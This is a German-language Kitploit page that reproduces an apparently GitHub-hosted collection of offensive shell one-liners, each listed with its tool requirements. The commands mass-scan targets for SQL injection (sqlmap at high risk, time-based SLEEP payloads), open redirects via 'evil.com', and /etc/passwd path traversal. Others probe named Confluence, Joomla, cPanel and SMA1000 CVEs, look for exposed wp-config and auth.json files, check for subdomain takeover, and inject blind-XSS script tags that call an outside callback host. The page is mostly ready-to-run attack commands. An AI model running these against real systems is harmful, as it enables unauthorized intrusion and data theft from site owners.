Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
One-Liner-Collections — Diese Repositories enthält eine Liste von One-Linern mit Beschreibungen und Installationsanforderungen. | Kitploit
Tools/GitHubGitHub/cybertix-pvt-ltd/one-liner-collections
SchwachstellenscannerWebanwendungs-ExploitationInformationsbeschaffungWebsicherheitPenetrationstestsSecret-ErkennungSubdomain-EnumerationKuratierte Ressourcen
GitHub
cybertix-pvt-ltd/one-liner-collections

One-Liner-Collections

Diese Repositories enthält eine Liste von One-Linern mit Beschreibungen und Installationsanforderungen.

Repository anzeigen
5078012vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

One-Liner-Sammlungen

Dieses Repository enthält eine Liste von One-Linern mit Beschreibungen und Installationsanforderungen

────────────────────────────────────────────────────────────────────────

SQL Injection

Installationsanforderungen

  1. Subfinder : https://github.com/projectdiscovery/subfinder
  2. GAU : https://github.com/lc/gau
  3. GF : https://github.com/tomnomnom/gf
  4. Findomain : https://github.com/Findomain/Findomain
  5. HTTPX : https://github.com/projectdiscovery/httpx
  6. Anew : https://github.com/tomnomnom/anew
  7. Waybackurls : https://github.com/tomnomnom/waybackurls
  8. SQLiDetector: https://github.com/eslam3kl/SQLiDetector

Einzeiler

root@kitploit:~
echo http://testphp.vulnweb.com | waybackurls > wayback_urls_for_target.txt ; python3 sqlidetector.py -f  wayback_urls_for_target.txt

root@kitploit:~
subfinder -d http://TARGET.com -silent -all | gau - blacklist ttf,woff,svg,png | sort -u | gf sqli >gf_sqli.txt; sqlmap -m gf_sqli.txt --batch --risk 3 --random-agent | tee -a sqli_report.txt
root@kitploit:~
findomain -t http://testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1
root@kitploit:~
cat urls.txt | grep ".php" | sed 's/\.php.*/.php\//' | sort -u | sed s/$/%27%22%60/ | while read url do ; do curl --silent "$url" | grep -qs "You have an error in your SQL syntax" && echo -e "$url \e[1;32mSQLI by Cybertix\e[0m" || echo -e "$url \e[1;31mNot Vulnerable to SQLI Injection\e[0m" ;done

root@kitploit:~
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"

Header-basierte blinde SQL-Injection

root@kitploit:~
cat domain.txt | httpx -silent -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(13),0))OR" -rt -timeout 20 -mrt '>13'

Zeitbasierte SQL-Injection

  1. apt install moreutils
  2. apt install parallel
root@kitploit:~
cat urls.txt | grep "=" | qsreplace "1 AND (SELECT 5230 FROM (SELECT(SLEEP(10)))SUmc)" > blindsqli.txt

Zeitbasierte SQL-Injection mit Waybackurls

root@kitploit:~
waybackurls https://TARGET.COM | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt 
root@kitploit:~
cat urls.txt | sed 's/=/=(CASE%20WHEN%20(888=888)%20THEN%20SLEEP(5)%20ELSE%20888%20END)/g' | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && time curl "'{}'"'

────────────────────────────────────────────────────────────────────────

Offene Weiterleitung

Installationsanforderungen

  1. Waybackurls : https://github.com/tomnomnom/waybackurls
  2. Bhedak : https://github.com/R0X4R/bhedak
  3. GAU : https://github.com/lc/gau
  4. GF : https://github.com/tomnomnom/gf
  5. QS-Replace : https://github.com/tomnomnom/qsreplace
  6. HTTPX : https://github.com/projectdiscovery/httpx
  7. Subfinder : https://github.com/projectdiscovery/subfinder
  8. Httprobe : https://github.com/tomnomnom/httprobe
  9. Nuclei : https://github.com/projectdiscovery/nuclei

Einzeiler

root@kitploit:~
waybackurls TARGET.COM | grep -a -i \=http | qsreplace 'http://evil.com' | while read host do;do curl -s -L $host -I| grep "evil.com" && echo "$host \033[0;31mVulnerable\n" ;done
root@kitploit:~
subfinder -dL domains.txt | httprobe |tee live_domain.txt; cat live_domain.txt | waybackurls | tee wayback.txt; cat wayback.txt | sort -u | grep "\?" > open.txt; nuclei -t Url-Redirection-Catcher.yaml -l open.txt

────────────────────────────────────────────────────────────────────────

NGINX-Pfad-Traversal

Installationsanforderungen

  1. HTTPX : https://github.com/projectdiscovery/httpx

Einzeiler

root@kitploit:~
httpx -l url.txt -path "///////../../../../../../etc/passwd" -status-code -mc 200 -ms 'root:'

────────────────────────────────────────────────────────────────────────

Subdomain-Übernahme

Installationsanforderungen

  1. Subfinder : https://github.com/projectdiscovery/subfinder
  2. Assetfinder : https://github.com/tomnomnom/assetfinder
  3. Amass : https://github.com/OWASP/Amass
  4. Subjack : https://github.com/haccer/subjack

Einzeiler

root@kitploit:~
subfinder -d HOST >> FILE; assetfinder --subs-only HOST >> FILE; amass enum -norecursive -noalts -d HOST >> FILE; subjack -w FILE -t 100 -timeout 30 -ssl -c $GOPATH/src/github.com/cybertix/subjack/fingerprints.json -v 3 >> takeover ;

────────────────────────────────────────────────────────────────────────

URLs aus dem Quellcode extrahieren

Einzeiler

root@kitploit:~
curl "https://TARGET.Com" | grep -oP '(https*.//|www\.)[^]*'

────────────────────────────────────────────────────────────────────────

XSS (Cross-Site Scripting)

Installationsanforderungen

  1. Katana : https://github.com/projectdiscovery/katana
  2. Dalfox : https://github.com/hahwul/dalfox
  3. Waybackurls : https://github.com/tomnomnom/waybackurls
  4. GF : https://github.com/tomnomnom/gf
  5. Dalfox : https://github.com/hahwul/dalfox
  6. HTTPX : https://github.com/projectdiscovery/httpx

Einzeiler

root@kitploit:~
echo http://testphp.vulnweb.com | katana -jc -f qurl -d 5 -c 50 -kf robotstxt,sitemapxml -silent | dalfox pipe --skip-bav
root@kitploit:~
waybackurls http://testphp.vulnweb.com | gf xss | sed 's/=.*/=/' | sort -u | tee XSS.txt && cat XSS.txt | dalfox -b http://chirag.bxss.in pipe > output.txt
root@kitploit:~
cat http://target.com | gau --subs | grep "https://" | grep -v "png\|jpg\|css\|js\|gif\|txt" | grep "=" | uro | dalfox pipe --deep-domxss --multicast --blind https://chirag.bxss.in

Massenhafte Blind-XSS-Suche

root@kitploit:~
cat domain.txt | waybackurls | httpx -H "User-Agent: \"><script src=https://chirag.bxss.in></script>"

────────────────────────────────────────────────────────────────────────

Endpunkte in JS finden

Installationsanforderungen

  1. Katana : https://github.com/projectdiscovery/katana
  2. Anew : https://github.com/tomnomnom/anew

Einzeiler

root@kitploit:~
katana -u http://testphp.vulnweb.com -js-crawl -d 5 -hl -filed endpoint | anew endpoint.txt

────────────────────────────────────────────────────────────────────────

Einzeiler für CVE-2023-23752 - 𝙅𝙤𝙤𝙢𝙡𝙖 𝙄𝙢𝙥𝙧𝙤𝙥𝙚𝙧 𝘼𝙘𝙘𝙚𝙨𝙨 𝙘𝙝𝙚𝙘𝙠 𝙞𝙣 𝙒𝙚𝙗𝙨𝙚𝙧𝙫𝙞𝙘𝙚 𝙀𝙣𝙙𝙥𝙤𝙞𝙣𝙩

Installationsanforderungen

  1. Subfinder : https://github.com/projectdiscovery/subfinder
  2. HTTPX : https://github.com/projectdiscovery/httpx

Einzeiler

root@kitploit:~
subfinder -d http://TARGET.COM -silent -all | httpx -silent -path 'api/index.php/v1/config/application?public=true' -mc 200

────────────────────────────────────────────────────────────────────────

cPanel CVE-2023-29489 XSS-Einzeiler

Installationsanforderungen

  1. Subfinder : https://github.com/projectdiscovery/subfinder
  2. HTTPX : https://github.com/projectdiscovery/httpx

Einzeiler

root@kitploit:~
subfinder -d http://example.com -silent -all | httpx -silent -ports http:80,https:443,2082,2083 -path '/cpanelwebcall/aaaaaaaaaaaaaaa' -mc 400

────────────────────────────────────────────────────────────────────────

WP-Config-Einzeiler

Installationsanforderungen

  1. Subfinder : https://github.com/projectdiscovery/subfinder
  2. HTTPX : https://github.com/projectdiscovery/httpx

Einzeiler

root@kitploit:~
subfinder -silent -d TARGET.com | httpx -silent -nc -p 80,443,8080,8443,9000,9001,9002,9003,8088 -path "/wp-config.PHP" -mc 200 -t 60 -status-code

────────────────────────────────────────────────────────────────────────

JS-Secret-Finder-Einzeiler

Installationsanforderungen

  1. Gau : https://github.com/lc/gau
  2. HTTPX : https://github.com/projectdiscovery/httpx
  3. Nuclei : https://github.com/projectdiscovery/nuclei

Einzeiler

root@kitploit:~
echo TARGET.com | gau | grep ".js" | httpx -content-type | grep 'application/javascript' | awk '{print $1}' | nuclei -t /root/nuclei-templates/exposures/ -silent > secrets.txt

────────────────────────────────────────────────────────────────────────

Memory-Dump und Offenlegung von Umgebungsvariablen

Installationsanforderungen

  1. Shodan : https://www.shodan.io

Einzeiler

root@kitploit:~
shodan search org: "Target" http.favicon.hash:116323821 --fields ip_str,port--separator | awk '{print $1 $2}'

────────────────────────────────────────────────────────────────────────

Einfachste Informationsoffenlegung im JSON-Body

Installationsanforderungen

  1. Waybackurls : https://github.com/tomnomnom/waybackurls
  2. HTTPX : https://github.com/projectdiscovery/httpx

Einzeiler

root@kitploit:~
cat subdomains.txt | waybackurls | httpx -mc 200 -ct | grep application/json

────────────────────────────────────────────────────────────────────────

Fuzzing mit 127.0.0.1 als Host-Header

Installationsanforderungen

  1. FFUF : https://github.com/ffuf/ffuf

Einzeiler

root@kitploit:~
ffuf -u https://target[.]com/FUZZ -H “Host: 127.0.0.1” -w /home/user/path/to/wordlist.txt -fs <regular_content_length>

────────────────────────────────────────────────────────────────────────

CVE-2023-0126 Pfad-Traversal-Schwachstelle vor der Authentifizierung in SMA1000

Einzeiler

root@kitploit:~
cat file.txt| while read host do;do curl -sk "http://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "is VULN";done

────────────────────────────────────────────────────────────────────────

Favicon-Hash der Zieldomain abrufen

Einzeiler

root@kitploit:~
curl -s -L -k https://TARGET.COM/favicon.ico | python3 -c 'import mmh3, sys, codecs; print(mmh3.hash(codecs.encode(sys.stdin.buffer.read(),"base64")))'

────────────────────────────────────────────────────────────────────────

CVE-2023-22515 Einzeiler Confluence Data Center & Server: Privilege Escalation

Einzeiler

root@kitploit:~
cat file.txt | while read host do; do curl -skL "http://$host/setup/setupadministrator.action" | grep -i "<title>Setup System Administrator" && echo $host "Vulnerable"; done

────────────────────────────────────────────────────────────────────────

CVE-2023-22518 – Schwachstelle durch unsachgemäße Autorisierung in Confluence Data Center und Server

Einzeiler

root@kitploit:~
subfinder -d TARGET.COM -silent | httpx -silent | nuclei -t CVE-2023-22518.yaml

────────────────────────────────────────────────────────────────────────

Sensible Informationen vom Endpunkt /auth.json extrahieren.

Einzeiler

root@kitploit:~
subfinder -d TARGET.COM | httpx -path "/auth.json" -title -status-code -content-length -t 80 -p 80,443,8080,8443,9000,9001,9002,9003

────────────────────────────────────────────────────────────────────────

xargs mit gau verwenden, um Bulk-Domains zu scannen, ohne an Geschwindigkeit zu verlieren.

Installationsanforderungen

  1. GAU : https://github.com/lc/gau

Einzeiler

root@kitploit:~
xargs -a alive.txt -I@ sh -c 'gau --blacklist css,jpg,jpeg,JPEG,ott,svg,js,ttf,png,woff2,woff,eot,gif "@"' | tee -a gau.txt

────────────────────────────────────────────────────────────────────────

Blindes XSS im X-Forwarded-For-Header.

Installationsanforderungen

  1. BXSS : https://github.com/ethicalhackingplayground/bxss
  2. GAU : https://github.com/lc/gau
  3. Findomain : https://github.com/Findomain/Findomain

Einzeiler

root@kitploit:~
findomain -t TARGET.COM | gau | bxss -payload '"><script src=https://chirag.bxss.in></script>' -header "X-Forwarded-For"

────────────────────────────────────────────────────────────────────────

Subdomain-Enumeration mit Google Tag Manager.

Einzeiler

root@kitploit:~
curl -s "https://www.googletagmanager.com/gtm.js?id=[TARGET-GTM-ID]" | grep -oP '"key","[a-zA-Z0-9.-]+\.[a-z]{2,}"' | awk -F'"' '{print $4}'

────────────────────────────────────────────────────────────────────────

Kubernetes-Setups in einer bestimmten Organisation suchen und auf zusätzliche Informationen prüfen.

Einzeiler

root@kitploit:~
shodan search org:"google" product:"Kubernetes" | awk '{print $3}' | httpx -path /pods -content-length -status-code -title

────────────────────────────────────────────────────────────────────────

NodeJS Elastic: Offenlegung interner Dateien.

Referenz:

https://tripla.dk/2020/03/26/multiple-vulnerabilities-in-nodejs-ecstatic-http-server-http-party/#:~:text=4.%20INTERNAL%20PATH%20DISCLOSURE

Einzeiler

root@kitploit:~
while read -r domain; do url="$domain/$(python3 -c 'print("A"*500)')"; response=$(curl -s "$url" 2>/dev/null); if echo "$response" | grep -q "ENAMETOOLONG.*stat"; then echo -e "[VULNERABLE] $url\n$(echo "$response" | grep 'ENAMETOOLONG')"; else echo "[SAFE] $domain"; fi; done < listofdomain.txt

────────────────────────────────────────────────────────────────────────

Einzeiler zum Finden von S3-Buckets

Installationsanforderungen:

  1. Assetfinder: https://github.com/tomnomnom/assetfinder
  2. HTTPX:https://github.com/projectdiscovery/httpx
  3. Anew: https://github.com/tomnomnom/anew
  4. Meg: https://github.com/tomnomnom/meg
  5. GF Pattern: https://github.com/thecybertix/GF-Patterns

Einzeiler

root@kitploit:~
assetfinder --subs-only TARGET.COM | httpx | anew hosts; meg -d 1000 -v /; gf s3-buckets
Tool herunterladen